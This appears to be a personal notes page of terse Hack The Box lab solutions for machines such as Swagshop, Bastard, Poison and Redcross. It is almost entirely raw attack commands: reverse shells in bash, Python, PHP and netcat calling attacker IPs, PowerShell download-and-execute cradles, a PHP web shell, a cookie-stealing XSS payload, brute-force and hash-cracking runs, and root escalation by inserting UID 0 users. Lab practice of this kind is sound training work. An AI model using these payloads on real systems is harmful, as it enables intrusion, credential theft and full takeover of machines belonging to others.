Machines Practice
Follow this medium series for OSCP based Hackthebox machines writeups without MSF by Rana :)
https://medium.com/@ranakhalil101/
Swagshop
one way to get root file
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
2nd way
www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/a :set shell=/bin/sh :shell
3rd way
sudo vi /var/www/html/a -c ':!/bin/sh'
python magento_rce.py 'http://10.10.10.140/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9001 >/tmp/f"
=============================================================
Arkham
nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt 10.10.10.130
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.130 --rate=700
smbmap -H 10.10.10.130 -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //10.10.10.130/BatShare
================================================================
Bastion
mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
05/10/2019
Bashed:
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py
/dev/shm - writable directory
sudo -u scriptmanager bash
upload reverse shell if normal shell not working
python -c 'import pty;pty.spawn("/bin/bash")'
/usr/share/laudanum/php/php-reverse-shell.php
====================================================================
Nibbles:
hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working ip block
cmd.php
GIF8;
find . | grep controllers
ldd --version - cat /etc/lsb-release
One solution to get root
Create one file monitor.sh
/bin/sh
bash
Other trick to get exploit for ubuntu version --------- Rational love exploit
https://www.exploit-db.com/exploits/43775
===================================================
Blue - window machine
Eternal blue : ms 17-010
nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]
Eternal blue exploit manually :https://www.exploit-db.com/download/42030 https://www.exploit-db.com/exploits/42315
modify the python exploit and put location in our payload
Exploit modification required
add computer name in to host file and then scan smb servers
smbclient -L \10.10.10.40 -N
smbclient \\haris-pc\Users
python exploit.py ip ntsvcs
===========================================================================
Sense - Linux Machine - PFsense
manual cmd injection
/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port
/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port|python
on attacker machine run this command
nc -vnlp port < cmd
In cmd we have this reverse shell code
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.10",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
nc -lvnp 3456
exploit-db exploit
=====================================================
Optimum
port 80 is opening httpfileserver
tcpdump -i tun0 %00{.exec|ping 10.10.14.10.}
use invoke-powershelltcp.ps1
C:\Windows\SysWow64 - 32 bit windows C:\Windows\system32 - 32 bit windows C:\Windows\Sysnative - 64 bit
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.10
ctrl shift u - to decode
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/InvokePowerhsleltcp.ps1').}
sherlock script execute to get the false positive patches
New-Object Net.WebClient}.downloadString('http://ip:port/InvokePowerhsleltcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 1234
New-Object Net.WebClient}.downloadString('http://10.10.14.10:8000/Sherlock.ps1')
Find-AllVulns
cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Invoke-MS16032.ps1')
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.10:8000/shell.ps1')"
====================================================
Node - Linux
3000- node
sed 's/,/\n/g' notes - password extract
api/users
crack the hashes online and offline
Hashes crack with hashcat and john hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt cat /home/alamot/.john/john.pot
online - hashes.org
grep -Ri password . | less
fcrackzip for zip files password cracker fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
download file with wget ; wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU" http://10.10.10.58:3000/api/admin/backup
base64 -d myplace.backup >myplace
privsec to tom user
mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
find / -perm -4000 2>/dev/null
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 "asd /bin/bash asd"
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 r??t/roo?.txt
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 root
using wildcard /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d > root.zip
command injection:
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"
=====================================================
Legacy - windows
Samba Scan
nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
First Exploit - ms08-67
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python ms08-067.py 10.10.10.4 6 445
wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe
host file with smbserver
smbserver.py a /usr/share/windows-binaries/
\\10.10.14.14\a\whoami.exe
===========================================================
Valentine
heartbleed vulnerability
python heartbleed.py -n 100 ip
for i in ${seq 0 100}; do python heartbleed.py ip; done
then find hype.key (hex to ascii)
ssh key and use this key and password get from heartbleed
ssh -i hype.key hype@ip
check the history and check ps elf | grep root
2nd exploit
gcc -pthread dirty.c -o dirty -lcrypt
su -
==============================================
Fuzzy web app challengeโ
gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htmโ
gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htmโ
wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=testโโ
wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZโโ
====================================== HDC HackTheBox Web Challenge Walkthrough/Solutionโ
so the doProcess() function submits the form data to the jquery, Then i had a look at jquery-3.2.1.js CTRL+F and searched for the doProcess()โ
credentials stored in js file doprocess functionโ
find emails on secret folder then run bruteforce in to all emails and get the flagโ
=======================================โ
Lernaean Web Challenge โ HackTheBoxโ
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593โ
========================================= CARTOGRAPHERโ
username= โ- and password= โ - sql injectionโ
info=flag
โ
[20 Points] Lernaean [by Arrexel]โ
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414โ
=========================================== [50 Points]โ
I know Mag1k [by rkmylo]โ
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"โ
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"
=======================================================
Bastard - windows
Drupal payload chnages
$url = 'http://10.10.10.9/'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $phpcode = <<<'EOD' <?php if (isset($_REQUEST['fuplaod'])) { file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.10:8000/" . $REQUEST['fupload'])); }; if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
}; ?> EOD; $file = [ 'filename' => 'sam.php', 'data' => $ippsec ];
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8080/chimichurri.exe')
\\10.10.14.10\sam\ms15-051x64.exe "\10.10.14.10\sam\nc64.exe -e cmd.exe 10.10.14.10 443" [#] ms15-051 fixed by zcgonvh powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/Invoke-PowerShellTcp.ps1')
\10.10.14.10\a\ms15-051x64.exe "\10.10.14.10\a\nc64.exe -e cmd.exe 10.10.14.10 443"
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/mv.ps1')
curl http://10.10.10.9/0xdf.php?cmd=whoami
http://10.10.10.9/0xdf.php?cmd=\\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')
Shell with Nishang
python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"
\\10.10.14.14\share\ms15-051x64.exe "whoami"
\\10.10.14.14\share\ms15-051x64.exe "\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"
===================================================
Poison
http://10.10.10.84/browse.php?file=listfiles.php - machine is vulnerable to lfi
add this shell in to user agent
User-Agent: 0xdf: <?php system($_GET['c']); ?>
then check the logs &c=id
connectivity check
view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.14.6
tcpdump -i tun0 icmp
view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=nc 10.10.14.6 8081
nc -lnvp 8081
Shell as WWW
Visit view-source:
http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f
,
Listening on localhost:
netstat -an -p tcp
ps -auwwx | grep vnc
Tunneling / VNC connection
tail /etc/proxychains.conf
ssh charix@10.10.10.84 -D 8081
proxychains vncviewer 127.0.0.1:5901 -passwd secret
Looking inside /root/.vnc/
, thereโs a passwd
file that matches the file secret
:
python /opt/vncpasswd.py/vncpasswd.py -d -f secret
LFi Filter :- php://filter/convert.base64-encode/resource=index.php
Request to add data in php variable which is visible on phpinfo.
Content-Type: multipart/form-data; boundary=--PleaseSubscribe
Content-Length: 166 ----PleaseSubscribe
Content-Disposition: form-data; name="sam"; filename="Leaveacomment"
Content-type:text/plain
Please share my videos
====================================================
Brainfuck:
python sshng2john.py id_rsa > braingfuck-crack
john brainfuck-crack --wordlist=/usr/share/wordlis ts/rockyou.txt
wpscan โurl https://brainfuck.htb โdisable-tls-checks
cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .
wordpress exploit -> smtp cred -> smtp cred to get secret forum password - > Encryption decryption
ssh2john id_rsa > id_john
john id_john โwordlist=/usr/share/wordlists/rockyou.txt
In orestis home directory there are a few files debug.txt, encrypt.sage and output.txt After some google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large)https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e python -c โprint format(24604052029401386049980296953784287079059245867880966944246662849341507003750, โxโ).decode(โhexโ)โ 6efc1a5dbb8904751ce6566a305bb8ef
grandparents (granny & grandpa
granny & grandpa
iptables -A OUTPUT -d 10.10.10.14 -j DROP
davtest --url http://10.10.10.15
move options check move ippsec.html destination ippsec.aspx
ms14-070 exploit work for root ms15-051 - not work
curl -X PUT http://10.10.10.15/shell.txt --data -binary @shell.aspx curl -X MOVE -H 'Destination: http://10.10.10.1 5/shell.aspx' http://10.10.10.15/shell.txt
curl http://10.10.10.15/shell.aspx
Reverse shell on metasploit
check 3 exploits for privilege escalation : ms16-016 ms15-051 ms14-058 - working fine msf5 exploit(windows/local/ms14_058_track_popup_menu)
post(multi/recon/local_exploit_suggester)
Microsoft IIS WebDav โScStoragePathFromUrlโ Remote Buffer Overflow
grandpa:
. Use exploit/windows/iis/iis_webdav_scstoragepathfromurl. As we can see below, set options. << use exploit/windows/iis/iis_webdav_scstoragepathfromurl>> << options >> << set RHOST 10.10.10.14>> <<set LHOST <attacking machine ip> >> <<set LPORT 1234>>
<< use exploits/windows/local/ms15_051_client_copy_image >> << options >>
============================================
Redcross
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20
Xss payload in to contact us form
<script>new Image().src="
http://10.10.14.14:8888/cookie.php?c="+document.cookie
;</script>
SQLi
On submitting the UserID filter, Iโm sent to https://intra.redcross.htb/?o=1&page=app
, where o=
is the id filtered on. If I try with a '
in there, https://intra.redcross.htb/?o=1'&page=app
:
sqlmap -r app.request --delay=1 --batch --dump
sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
nmap -p- --min-rate 5000 10.10.10.113
python 41162.py -c "ping -c 1 10.10.14.14" -t penelope@redcross.htb -m 10.10.10.113
tcpdump -i tun0 -n icmp
python 41162.py -c "php -r '\$sock=fsockopen(\"10.10.14.14\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t penelope@redcross.htb -m 10.10.10.113
Injection RCE
Brup Suite RCE :
ip=1;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.23",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&action=deny
Priv esc to penelope
s = smtplib.SMTP(mailserver,1025)
./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross
Priv esc to root
penelope@redcross:/etc$ psql -h 127.0.0.1 -U unixnss -W unix
openssl passwd -1 0xdf
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');
Path 1: sudoers Group
insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su
Path 2: Via unixnssroot
unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');
Find psql Configs
ls -l nss-pgsql*
cat nss-pgsql-root.conf
psql -h 127.0.0.1 -U unixnssroot -p 5432 -d unix
This user can add a user with user id 0 (root):
insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot
Using this account, we are able to create a new user with UID 0:
insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');
Last updated
Was this helpful?